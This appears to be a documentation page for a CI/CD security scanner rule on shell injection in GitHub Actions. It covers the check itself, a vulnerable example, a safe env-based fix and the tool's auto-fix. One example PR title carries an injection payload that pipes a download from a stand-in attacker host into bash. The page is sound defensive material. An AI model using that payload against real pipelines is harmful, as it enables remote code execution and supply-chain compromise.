CICD-SEC-4 — Poisoned Pipeline Execution (shell injection)

Field	Value
Category	`CICD-SEC-4`
Severity	HIGH
OWASP	CICD-SEC-4: Poisoned Pipeline Execution (PPE)
Auto-fix	✓ (what it does)

What the check does

Flags any step whose inline run: script contains a ${{ github.event.* }} interpolation from a user-controlled context:

github.event.pull_request.*
github.event.issue.*
github.event.comment.*
github.event.head_commit.*
github.event.commits.*

GitHub Actions substitutes these expressions into the shell command string before execution, so an attacker who can shape the value (a PR title, issue body, commit message) can inject arbitrary shell.

Vulnerable example

- name: Greet PR
  run: |
    echo "Welcome ${{ github.event.pull_request.title }}!"   # ← injection

A PR titled "; curl evil.example.com/x | bash; # becomes:

echo "Welcome "; curl evil.example.com/x | bash; #!"

Safe alternative

Lift the untrusted value into the step’s env: block first, then reference it as a normal shell variable:

- name: Greet PR
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  run: |
    echo "Welcome $PR_TITLE!"

The env: substitution happens before the shell is invoked, and shells treat $VAR expansion as a single argument — no command parsing happens against the value.

Auto-fix

--fix performs the lift automatically:

For each matched ${{ github.event.* }} expression in the step’s run:,
Create a corresponding entry in the step’s env: block (creates the block if missing), and
Replace the interpolation in the script with $VAR_NAME.

Variable names are derived from the expression path (e.g. github.event.pull_request.title → PR_PULL_REQUEST_TITLE).

CICD-SEC-3 — Unpinned third-party action CICD-SEC-5 — Missing permissions specification

⌘I

Documentation Index

​What the check does

​Vulnerable example

​Safe alternative

​Auto-fix

What the check does

Vulnerable example

Safe alternative

Auto-fix